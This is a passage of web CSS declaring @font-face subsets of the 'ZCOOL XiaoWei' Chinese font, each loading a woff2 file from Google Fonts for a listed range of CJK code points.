\'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.31.woff2) format(\'woff2\');unicode-range: U+9163-9164, U+9169, U+9170, U+9172, U+9174, U+9179-917a, U+917d-917e, U+9182-9183, U+9185, U+918c-918d, U+9190-9191, U+919a, U+919c, U+91a1-91a4, U+91a8, U+91aa-91af, U+91b4-91b5, U+91b8, U+91ba, U+91be, U+91c0-91c1, U+91c6, U+91c8, U+91cb, U+91d0, U+91d2, U+91d7-91d8, U+91dd, U+91e3, U+91e6-91e7, U+91ed, U+91f0, U+91f5, U+91f9, U+9200, U+9205, U+9207-920a, U+920d-920e, U+9210, U+9214-9215, U+921c, U+921e, U+9221, U+9223-9227, U+9229-922a, U+922d, U+9234-9235, U+9237, U+9239-923a, U+923c-9240, U+9244-9246, U+9249, U+924e-924f, U+9251, U+9253, U+9257, U+925b, U+925e, U+9262, U+9264-9266, U+9268, U+926c, U+926f, U+9271, U+927b, U+927e, U+9280, U+9283, U+9285-928a, U+928e, U+9291, U+9293, U+9296, U+9298, U+929c-929d, U+92a8, U+92ab-92ae, U+92b3, U+92b6-92b7, U+92b9, U+92c1, U+92c5-92c6, U+92c8, U+92cc, U+92d0, U+92d2, U+92e4, U+92ea;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.32.woff2) format(\'woff2\');unicode-range: U+9004, U+900b, U+9011, U+9015-9016, U+901e, U+9021, U+9026, U+902d, U+902f, U+9031, U+9035-9036, U+9039-903a, U+9041, U+9044-9046, U+904a, U+904f-9052, U+9054-9055, U+9058-9059, U+905b-905e, U+9060-9062, U+9068-9069, U+906f, U+9072, U+9074, U+9076-907a, U+907c-907d, U+9081, U+9083, U+9085, U+9087-908b, U+908f, U+9095, U+9097, U+9099-909b, U+909d, U+90a0-90a1, U+90a8-90a9, U+90ac, U+90b0, U+90b2-90b4, U+90b6, U+90b8, U+90ba, U+90bd-90be, U+90c3-90c5, U+90c7-90c8, U+90cf-90d0, U+90d3, U+90d5, U+90d7, U+90da-90dc, U+90de, U+90e2, U+90e4, U+90e6-90e7, U+90ea-90eb, U+90ef, U+90f4-90f5, U+90f7, U+90fe-9100, U+9104, U+9109, U+910c, U+9112, U+9114-9115, U+9118, U+911c, U+911e, U+9120, U+9122-9123, U+9127, U+912d, U+912f-9132, U+9139-913a, U+9143, U+9146, U+9149-914a, U+914c, U+914e-9150, U+9154, U+9157, U+915a, U+915d-915e, U+9161-9162;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.33.woff2) format(\'woff2\');unicode-range: U+8e41-8e42, U+8e47, U+8e49-8e4b, U+8e50-8e53, U+8e59-8e5a, U+8e5f-8e60, U+8e64, U+8e69, U+8e6c, U+8e70, U+8e74, U+8e76, U+8e7a-8e7c, U+8e7f, U+8e84-8e85, U+8e87, U+8e89, U+8e8b, U+8e8d, U+8e8f-8e90, U+8e94, U+8e99, U+8e9c, U+8e9e, U+8eaa, U+8eac, U+8eb0, U+8eb6, U+8ec0, U+8ec6, U+8eca-8ece, U+8ed2, U+8eda, U+8edf, U+8ee2, U+8eeb, U+8ef8, U+8efb-8efe, U+8f03, U+8f09, U+8f0b, U+8f12-8f15, U+8f1b, U+8f1d, U+8f1f, U+8f29-8f2a, U+8f2f, U+8f36, U+8f38, U+8f3b, U+8f3e-8f3f, U+8f44-8f45, U+8f49, U+8f4d-8f4e, U+8f5f, U+8f6b, U+8f6d, U+8f71-8f73, U+8f75-8f76, U+8f78-8f7a, U+8f7c, U+8f7e, U+8f81-8f82, U+8f84, U+8f87, U+8f8a-8f8b, U+8f8d-8f8f, U+8f94-8f95, U+8f97-8f9a, U+8fa6, U+8fad-8faf, U+8fb2, U+8fb5-8fb7, U+8fba-8fbc, U+8fbf, U+8fc2, U+8fcb, U+8fcd, U+8fd3, U+8fd5, U+8fd7, U+8fda, U+8fe2-8fe5, U+8fe8-8fe9, U+8fee, U+8ff3-8ff4, U+8ff8, U+8ffa;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.34.woff2) format(\'woff2\');unicode-range: U+8cbd, U+8cbf-8cc4, U+8cc7-8cc8, U+8cca, U+8ccd, U+8cd1, U+8cd3, U+8cdb-8cdc, U+8cde, U+8ce0, U+8ce2-8ce4, U+8ce6-8ce8, U+8cea, U+8ced, U+8cf4, U+8cf8, U+8cfa, U+8cfc-8cfd, U+8d04-8d05, U+8d07-8d08, U+8d0a, U+8d0d, U+8d0f, U+8d13-8d14, U+8d16, U+8d1b, U+8d20, U+8d30, U+8d32-8d33, U+8d36, U+8d3b, U+8d3d, U+8d40, U+8d42-8d43, U+8d45-8d46, U+8d48-8d4a, U+8d4d, U+8d51, U+8d53, U+8d55, U+8d59, U+8d5c-8d5d, U+8d5f, U+8d61, U+8d66-8d67, U+8d6a, U+8d6d, U+8d71, U+8d73, U+8d84, U+8d90-8d91, U+8d94-8d95, U+8d99, U+8da8, U+8daf, U+8db1, U+8db5, U+8db8, U+8dba, U+8dbc, U+8dbf, U+8dc2, U+8dc4, U+8dc6, U+8dcb, U+8dce-8dcf, U+8dd6-8dd7, U+8dda-8ddb, U+8dde, U+8de1, U+8de3-8de4, U+8de9, U+8deb-8dec, U+8df0-8df1, U+8df6-8dfd, U+8e05, U+8e07, U+8e09-8e0a, U+8e0c, U+8e0e, U+8e10, U+8e14, U+8e1d-8e1f, U+8e23, U+8e26, U+8e2b-8e31, U+8e34-8e35, U+8e39-8e3a, U+8e3d, U+8e40;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.35.woff2) format(\'woff2\');unicode-range: U+8b80, U+8b83, U+8b8a, U+8b8c, U+8b90, U+8b93, U+8b99-8b9a, U+8ba0, U+8ba3, U+8ba5-8ba7, U+8baa-8bac, U+8bb4-8bb5, U+8bb7, U+8bb9, U+8bc2-8bc3, U+8bc5, U+8bcb-8bcc, U+8bce-8bd0, U+8bd2-8bd4, U+8bd6, U+8bd8-8bd9, U+8bdc, U+8bdf, U+8be3-8be4, U+8be7-8be9, U+8beb-8bec, U+8bee, U+8bf0, U+8bf2-8bf3, U+8bf6, U+8bf9, U+8bfc-8bfd, U+8bff-8c00, U+8c02, U+8c04, U+8c06-8c07, U+8c0c, U+8c0f, U+8c11-8c12, U+8c14-8c1b, U+8c1d-8c21, U+8c24-8c25, U+8c27, U+8c2a-8c2c, U+8c2e-8c30, U+8c32-8c36, U+8c3f, U+8c47-8c4c, U+8c4e-8c50, U+8c54-8c56, U+8c62, U+8c68, U+8c6c, U+8c73, U+8c78, U+8c7a, U+8c82, U+8c85, U+8c89-8c8a, U+8c8d-8c8e, U+8c90, U+8c93-8c94, U+8c98, U+8c9d-8c9e, U+8ca0-8ca2, U+8ca7-8cac, U+8caf-8cb0, U+8cb3-8cb4, U+8cb6-8cb9, U+8cbb-8cbc;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.36.woff2) format(\'woff2\');unicode-range: U+8a15-8a18, U+8a1a-8a1b, U+8a1d, U+8a1f, U+8a22-8a23, U+8a25, U+8a2b, U+8a2d, U+8a31, U+8a33-8a34, U+8a36-8a38, U+8a3a, U+8a3c, U+8a3e, U+8a40-8a41, U+8a46, U+8a48, U+8a50, U+8a52, U+8a54-8a55, U+8a58, U+8a5b, U+8a5d-8a63, U+8a66, U+8a69-8a6b, U+8a6d-8a6e, U+8a70, U+8a72-8a73, U+8a7a, U+8a85, U+8a87, U+8a8a, U+8a8c-8a8d, U+8a90-8a92, U+8a95, U+8a98, U+8aa0-8aa1, U+8aa3-8aa6, U+8aa8-8aa9, U+8aac-8aae, U+8ab0, U+8ab2, U+8ab8-8ab9, U+8abc, U+8abe-8abf, U+8ac7, U+8acf, U+8ad2, U+8ad6-8ad7, U+8adb-8adc, U+8adf, U+8ae1, U+8ae6-8ae8, U+8aeb, U+8aed-8aee, U+8af1, U+8af3-8af4, U+8af7-8af8, U+8afa, U+8afe, U+8b00-8b02, U+8b07, U+8b0a, U+8b0c, U+8b0e, U+8b10, U+8b17, U+8b19, U+8b1b, U+8b1d, U+8b20-8b21, U+8b26, U+8b28, U+8b2c, U+8b33, U+8b39, U+8b3e-8b3f, U+8b41, U+8b45, U+8b49, U+8b4c, U+8b4f, U+8b57-8b58, U+8b5a, U+8b5c, U+8b5e, U+8b60, U+8b6c, U+8b6f-8b70, U+8b72, U+8b74, U+8b77, U+8b7d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.37.woff2) format(\'woff2\');unicode-range: U+8882, U+8884-8886, U+8888, U+888f, U+8892-8893, U+889b, U+88a2, U+88a4, U+88a6, U+88a8, U+88aa, U+88ae, U+88b1, U+88b4, U+88b7, U+88bc, U+88c0, U+88c6-88c9, U+88ce-88cf, U+88d1-88d3, U+88d8, U+88db-88dd, U+88df, U+88e1-88e3, U+88e5, U+88e8, U+88ec, U+88f0-88f1, U+88f3-88f4, U+88fc-88fe, U+8900, U+8902, U+8906-8907, U+8909-890c, U+8912-8915, U+8918-891b, U+8921, U+8925, U+892b, U+8930, U+8932, U+8934, U+8936, U+893b, U+893d, U+8941, U+894c, U+8955-8956, U+8959, U+895c, U+895e-8960, U+8966, U+896a, U+896c, U+896f-8970, U+8972, U+897b, U+897e, U+8980, U+8983, U+8985, U+8987-8988, U+898c, U+898f, U+8993, U+8997, U+899a, U+89a1, U+89a7, U+89a9-89aa, U+89b2-89b3, U+89b7, U+89c0, U+89c7, U+89ca-89cc, U+89ce-89d1, U+89d6, U+89da, U+89dc, U+89de, U+89e5, U+89e7, U+89eb, U+89ef, U+89f1, U+89f3-89f4, U+89f8, U+89ff, U+8a01-8a03, U+8a07-8a0a, U+8a0e-8a0f, U+8a13;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.38.woff2) format(\'woff2\');unicode-range: U+86f4, U+86f8-86f9, U+86fb, U+86fe, U+8703, U+8706-870a, U+870d, U+8711-8713, U+871a, U+871e, U+8722-8723, U+8725, U+8729, U+872e, U+8731, U+8734, U+8737, U+873a-873b, U+873e-8740, U+8742, U+8747-8748, U+8753, U+8755, U+8757-8758, U+875d, U+875f, U+8762-8766, U+8768, U+876e, U+8770, U+8772, U+8775, U+8778, U+877b-877e, U+8782, U+8785, U+8788, U+878b, U+8793, U+8797, U+879a, U+879e-87a0, U+87a2-87a3, U+87a8, U+87ab-87ad, U+87af, U+87b3, U+87b5, U+87bd, U+87c0, U+87c4, U+87c6, U+87ca-87cb, U+87d1-87d2, U+87db-87dc, U+87de, U+87e0, U+87e5, U+87ea, U+87ec, U+87ee, U+87f2-87f3, U+87fb, U+87fd-87fe, U+8802-8803, U+8805, U+880a-880b, U+880d, U+8813-8816, U+8819, U+881b, U+881f, U+8821, U+8823, U+8831-8832, U+8835-8836, U+8839, U+883b-883c, U+8844, U+8846, U+884a, U+884e, U+8852-8853, U+8855, U+8859, U+885b, U+885d-885e, U+8862, U+8864, U+8869-886a, U+886e-886f, U+8872, U+8879, U+887d-887f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.39.woff2) format(\'woff2\');unicode-range: U+8548, U+854e, U+8553, U+8556-8557, U+8559, U+855e, U+8561, U+8564-8565, U+8568-856a, U+856d, U+856f-8570, U+8572, U+8576, U+8579-857b, U+8580, U+8585-8586, U+8588, U+858a, U+858f, U+8591, U+8594, U+8599, U+859c, U+85a2, U+85a4, U+85a6, U+85a8-85a9, U+85ab-85ac, U+85ae, U+85b7-85b9, U+85be, U+85c1, U+85c7, U+85cd, U+85d0, U+85d3, U+85d5, U+85dc-85dd, U+85df-85e0, U+85e5-85e6, U+85e8-85ea, U+85f4, U+85f9, U+85fe-85ff, U+8602, U+8605-8607, U+860a-860b, U+8616, U+8618, U+861a, U+8627, U+8629, U+862d, U+8638, U+863c, U+863f, U+864d, U+864f, U+8652-8655, U+865b-865c, U+865f, U+8662, U+8667, U+866c, U+866e, U+8671, U+8675, U+867a-867c, U+867f, U+868b, U+868d, U+8693, U+869c-869d, U+86a1, U+86a3-86a4, U+86a7-86a9, U+86ac, U+86af-86b1, U+86b4-86b6, U+86ba, U+86c0, U+86c4, U+86c6, U+86c9-86ca, U+86cd-86d1, U+86d4, U+86d8, U+86de-86df, U+86e4, U+86e6, U+86e9, U+86ed, U+86ef-86f3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.40.woff2) format(\'woff2\');unicode-range: U+83c5, U+83c8-83c9, U+83cb, U+83d1, U+83d3-83d6, U+83d8, U+83db, U+83dd, U+83df, U+83e1, U+83e5, U+83ea-83eb, U+83f0, U+83f4, U+83f8-83f9, U+83fb, U+83fd, U+83ff, U+8401, U+8406, U+840a-840b, U+840f, U+8411, U+8418, U+841c, U+8420, U+8422-8424, U+8426, U+8429, U+842c, U+8438-8439, U+843b-843c, U+843f, U+8446-8447, U+8449, U+844e, U+8451-8452, U+8456, U+8459-845a, U+845c, U+8462, U+8466, U+846d, U+846f-8470, U+8473, U+8476-8478, U+847a, U+847d, U+8484-8485, U+8487, U+8489, U+848c, U+848e, U+8490, U+8493-8494, U+8497, U+849b, U+849e-849f, U+84a1, U+84a5, U+84a8, U+84af, U+84b4, U+84b9-84bf, U+84c1-84c2, U+84c5-84c7, U+84ca-84cb, U+84cd, U+84d0-84d1, U+84d3, U+84d6, U+84df-84e0, U+84e2-84e3, U+84e5-84e7, U+84ee, U+84f3, U+84f6, U+84fa, U+84fc, U+84ff-8500, U+850c, U+8511, U+8514-8515, U+8517-8518, U+851f, U+8523, U+8525-8526, U+8529, U+852b, U+852d, U+8532, U+8534-8535, U+8538-853a, U+853c, U+8543, U+8545;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.41.woff2) format(\'woff2\');unicode-range: U+82bc, U+82be, U+82c0-82c2, U+82c4-82c8, U+82ca-82cc, U+82ce, U+82d0, U+82d2-82d3, U+82d5-82d6, U+82d8-82d9, U+82dc-82de, U+82e0-82e4, U+82e7, U+82e9-82eb, U+82ed-82ee, U+82f3-82f4, U+82f7-82f8, U+82fa-8301, U+8306-8308, U+830c-830d, U+830f, U+8311, U+8313-8315, U+8318, U+831a-831b, U+831d, U+8324, U+8327, U+832a, U+832c-832d, U+832f, U+8331-8334, U+833a-833c, U+8340, U+8343-8345, U+8347-8348, U+834a, U+834c, U+834f, U+8351, U+8356, U+8358-835c, U+835e, U+8360, U+8364-8366, U+8368-836a, U+836c-836e, U+8373, U+8378, U+837b-837d, U+837f-8380, U+8382, U+8388, U+838a-838b, U+8392, U+8394, U+8396, U+8398-8399, U+839b-839c, U+83a0, U+83a2-83a3, U+83a8-83aa, U+83ae-83b0, U+83b3-83b4, U+83b6, U+83b8, U+83ba, U+83bc-83bd, U+83bf-83c0, U+83c2;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.42.woff2) format(\'woff2\');unicode-range: U+8166-8169, U+816b, U+816d, U+8171, U+8173-8174, U+8178, U+817c-817d, U+8182, U+8188, U+8191, U+8198-819b, U+81a0, U+81a3, U+81a5-81a6, U+81a9, U+81b6, U+81ba-81bb, U+81bd, U+81bf, U+81c1, U+81c3, U+81c6, U+81c9-81ca, U+81cc-81cd, U+81d1, U+81d3-81d4, U+81d8, U+81db-81dc, U+81de-81df, U+81e5, U+81e7-81e9, U+81eb-81ec, U+81ee-81ef, U+81f5, U+81f8, U+81fa, U+81fc, U+81fe, U+8200-8202, U+8204, U+8208-820a, U+820e-8210, U+8216-8218, U+821b-821c, U+8221-8224, U+8226-8228, U+822b, U+822d, U+822f, U+8232-8234, U+8237-8238, U+823a-823b, U+823e, U+8244, U+8249, U+824b, U+824f, U+8259-825a, U+825f, U+8266, U+8268, U+826e, U+8271, U+8276-8279, U+827d, U+827f, U+8283-8284, U+8288-828a, U+828d-8291, U+8293-8294, U+8296-8298, U+829f-82a1, U+82a3-82a4, U+82a7-82ab, U+82ae, U+82b0, U+82b2, U+82b4-82b6;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.43.woff2) format(\'woff2\');unicode-range: U+8016, U+8018-8019, U+801c, U+801e, U+8026-802a, U+8031, U+8034-8035, U+8037, U+8043, U+804b, U+804d, U+8052, U+8056, U+8059, U+805e, U+8061, U+8068-8069, U+806e-8074, U+8076-8078, U+807c-8080, U+8082, U+8084-8085, U+8088, U+808f, U+8093, U+809c, U+809f, U+80ab, U+80ad-80ae, U+80b1, U+80b6-80b8, U+80bc-80bd, U+80c2, U+80c4, U+80ca, U+80cd, U+80d1, U+80d4, U+80d7, U+80d9-80db, U+80dd, U+80e0, U+80e4-80e5, U+80e7-80ed, U+80ef-80f1, U+80f3-80f4, U+80fc, U+8101, U+8104-8105, U+8107-8108, U+810c-810e, U+8112-8115, U+8117-8119, U+811b-811f, U+8121-8130, U+8132-8134, U+8137, U+8139, U+813f-8140, U+8142, U+8146, U+8148, U+814d-814e, U+8151, U+8153, U+8158-815a, U+815e, U+8160;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.44.woff2) format(\'woff2\');unicode-range: U+7ef0-7ef2, U+7ef6, U+7efa-7efb, U+7efe, U+7f01-7f04, U+7f08, U+7f0a-7f12, U+7f17, U+7f19, U+7f1b-7f1c, U+7f1f, U+7f21-7f23, U+7f25-7f28, U+7f2a-7f33, U+7f35-7f37, U+7f3d, U+7f42, U+7f44-7f45, U+7f4c-7f4d, U+7f52, U+7f54, U+7f58-7f59, U+7f5d, U+7f5f-7f61, U+7f63, U+7f65, U+7f68, U+7f70-7f71, U+7f73-7f75, U+7f77, U+7f79, U+7f7d-7f7e, U+7f85-7f86, U+7f88-7f89, U+7f8b-7f8c, U+7f90-7f91, U+7f94-7f96, U+7f98-7f9b, U+7f9d, U+7f9f, U+7fa3, U+7fa7-7fa9, U+7fac-7fb2, U+7fb4, U+7fb6, U+7fb8, U+7fbc, U+7fbf-7fc0, U+7fc3, U+7fca, U+7fcc, U+7fce, U+7fd2, U+7fd5, U+7fd9-7fdb, U+7fdf, U+7fe3, U+7fe5-7fe7, U+7fe9, U+7feb-7fec, U+7fee-7fef, U+7ff1, U+7ff3-7ff4, U+7ff9-7ffa, U+7ffe, U+8004, U+8006, U+800b, U+800e, U+8011-8012, U+8014;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.45.woff2) format(\'woff2\');unicode-range: U+7dd2, U+7dd4, U+7dd6-7dd8, U+7dda-7de0, U+7de2-7de6, U+7de8-7ded, U+7def, U+7df1-7df5, U+7df7, U+7df9, U+7dfb-7dfc, U+7dfe-7e02, U+7e04, U+7e08-7e0b, U+7e12, U+7e1b, U+7e1e, U+7e20, U+7e22-7e23, U+7e26, U+7e29, U+7e2b, U+7e2e-7e2f, U+7e31, U+7e37, U+7e39-7e3e, U+7e40, U+7e43-7e44, U+7e46-7e47, U+7e4a-7e4b, U+7e4d-7e4e, U+7e51, U+7e54-7e56, U+7e58-7e5b, U+7e5d-7e5e, U+7e61, U+7e66-7e67, U+7e69-7e6b, U+7e6d, U+7e70, U+7e73, U+7e77, U+7e79, U+7e7b-7e7d, U+7e81-7e82, U+7e8c-7e8d, U+7e8f, U+7e92-7e94, U+7e96, U+7e98, U+7e9a-7e9c, U+7e9e-7e9f, U+7ea1, U+7ea3, U+7ea5, U+7ea8-7ea9, U+7eab, U+7ead-7eae, U+7eb0, U+7ebb, U+7ebe, U+7ec0-7ec2, U+7ec9, U+7ecb-7ecc, U+7ed0, U+7ed4, U+7ed7, U+7edb, U+7ee0-7ee2, U+7ee5-7ee6, U+7ee8, U+7eeb;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.46.woff2) format(\'woff2\');unicode-range: U+7ce8, U+7cec, U+7cf0, U+7cf5-7cf9, U+7cfc, U+7cfe, U+7d00, U+7d04-7d0b, U+7d0d, U+7d10-7d14, U+7d17-7d19, U+7d1b-7d1f, U+7d21, U+7d24-7d26, U+7d28-7d2a, U+7d2c-7d2e, U+7d30-7d31, U+7d33, U+7d35-7d36, U+7d38-7d3a, U+7d40, U+7d42-7d44, U+7d46, U+7d4b-7d4c, U+7d4f, U+7d51, U+7d54-7d56, U+7d58, U+7d5b-7d5c, U+7d5e, U+7d61-7d63, U+7d66, U+7d68, U+7d6a-7d6c, U+7d6f, U+7d71-7d73, U+7d75-7d77, U+7d79-7d7a, U+7d7e, U+7d81, U+7d84-7d8b, U+7d8d, U+7d8f, U+7d91, U+7d94, U+7d96, U+7d98-7d9a, U+7d9c-7da0, U+7da2, U+7da6, U+7daa-7db1, U+7db4-7db8, U+7dba-7dbf, U+7dc1, U+7dc4, U+7dc7-7dc8, U+7dca-7dcd, U+7dcf, U+7dd1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.47.woff2) format(\'woff2\');unicode-range: U+7bd3-7bd4, U+7bd9-7bda, U+7bdd, U+7be0-7be1, U+7be4-7be6, U+7be9-7bea, U+7bef, U+7bf4, U+7bf6, U+7bfc, U+7bfe, U+7c01, U+7c03, U+7c07-7c08, U+7c0a-7c0d, U+7c0f, U+7c11, U+7c15-7c16, U+7c19, U+7c1e-7c21, U+7c23-7c24, U+7c26, U+7c28-7c33, U+7c35, U+7c37-7c3b, U+7c3d-7c3e, U+7c40-7c41, U+7c43, U+7c47-7c48, U+7c4c, U+7c50, U+7c53-7c54, U+7c59, U+7c5f-7c60, U+7c63-7c65, U+7c6c, U+7c6e, U+7c72, U+7c74, U+7c79-7c7a, U+7c7c, U+7c81-7c82, U+7c84-7c85, U+7c88, U+7c8a-7c91, U+7c93-7c96, U+7c99, U+7c9b-7c9e, U+7ca0-7ca2, U+7ca6-7ca9, U+7cac, U+7caf-7cb3, U+7cb5-7cb7, U+7cba-7cbd, U+7cbf-7cc2, U+7cc5, U+7cc7-7cc9, U+7ccc-7ccd, U+7cd7, U+7cdc, U+7cde, U+7ce0, U+7ce4-7ce5, U+7ce7;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.48.woff2) format(\'woff2\');unicode-range: U+7ae6, U+7af4-7af7, U+7afa-7afb, U+7afd-7b0a, U+7b0c, U+7b0e-7b0f, U+7b13, U+7b15-7b16, U+7b18-7b19, U+7b1e-7b20, U+7b22-7b25, U+7b29-7b2b, U+7b2d-7b2e, U+7b30-7b3b, U+7b3e-7b3f, U+7b41-7b42, U+7b44-7b47, U+7b4a, U+7b4c-7b50, U+7b58, U+7b5a, U+7b5c, U+7b60, U+7b66-7b67, U+7b69, U+7b6c-7b6f, U+7b72-7b76, U+7b7b-7b7d, U+7b7f, U+7b82, U+7b85, U+7b87, U+7b8b-7b96, U+7b98-7b99, U+7b9b-7b9f, U+7ba2-7ba4, U+7ba6-7bac, U+7bae-7bb0, U+7bb4, U+7bb7-7bb9, U+7bbb, U+7bc0-7bc1, U+7bc3-7bc4, U+7bc6, U+7bc8-7bcc, U+7bd1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.49.woff2) format(\'woff2\');unicode-range: U+798b-798e, U+7992, U+7994-7995, U+7997-7998, U+799a-799c, U+799f, U+79a3-79a6, U+79a8-79ac, U+79ae-79b1, U+79b3-79b5, U+79b8, U+79ba, U+79bf, U+79c2, U+79c6, U+79c8, U+79cf, U+79d5-79d6, U+79dd-79de, U+79e3, U+79e7-79e8, U+79eb, U+79ed, U+79f4, U+79f7-79f8, U+79fa, U+79fe, U+7a02-7a03, U+7a05, U+7a0a, U+7a14, U+7a17, U+7a19, U+7a1c, U+7a1e-7a1f, U+7a23, U+7a25-7a26, U+7a2c, U+7a2e, U+7a30-7a32, U+7a36-7a37, U+7a39, U+7a3c, U+7a40, U+7a42, U+7a47, U+7a49, U+7a4c-7a4f, U+7a51, U+7a55, U+7a5b, U+7a5d-7a5e, U+7a62-7a63, U+7a66, U+7a68-7a69, U+7a6b, U+7a70, U+7a78, U+7a80, U+7a85-7a88, U+7a8a, U+7a90, U+7a93-7a96, U+7a98, U+7a9b-7a9c, U+7a9e, U+7aa0-7aa1, U+7aa3, U+7aa8-7aaa, U+7aac-7ab0, U+7ab3, U+7ab8, U+7aba, U+7abd-7abf, U+7ac4-7ac5, U+7ac7-7ac8, U+7aca, U+7ad1-7ad2, U+7ada-7add, U+7ae1, U+7ae4;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.50.woff2) format(\'woff2\');unicode-range: U+784c, U+784e-7854, U+7856-7857, U+7859-785a, U+7865, U+7869-786a, U+786d, U+786f, U+7876-7877, U+787c, U+787e-787f, U+7881, U+7887-7889, U+7893-7894, U+7898-789e, U+78a1, U+78a3, U+78a5, U+78a9, U+78ad, U+78b2, U+78b4, U+78b6, U+78b9-78ba, U+78bc, U+78bf, U+78c3, U+78c9, U+78cb, U+78d0-78d2, U+78d4, U+78d9-78da, U+78dc, U+78de, U+78e1, U+78e5-78e6, U+78ea, U+78ec, U+78ef, U+78f1-78f2, U+78f4, U+78fa-78fb, U+78fe, U+7901-7902, U+7905, U+7907, U+7909, U+790b-790c, U+790e, U+7910, U+7913, U+7919-791b, U+791e-791f, U+7921, U+7924, U+7926, U+792a-792b, U+7934, U+7936, U+7939, U+793b, U+793d, U+7940, U+7942-7943, U+7945-7947, U+7949-794a, U+794c, U+794e-7951, U+7953-7955, U+7957-795a, U+795c, U+795f-7960, U+7962, 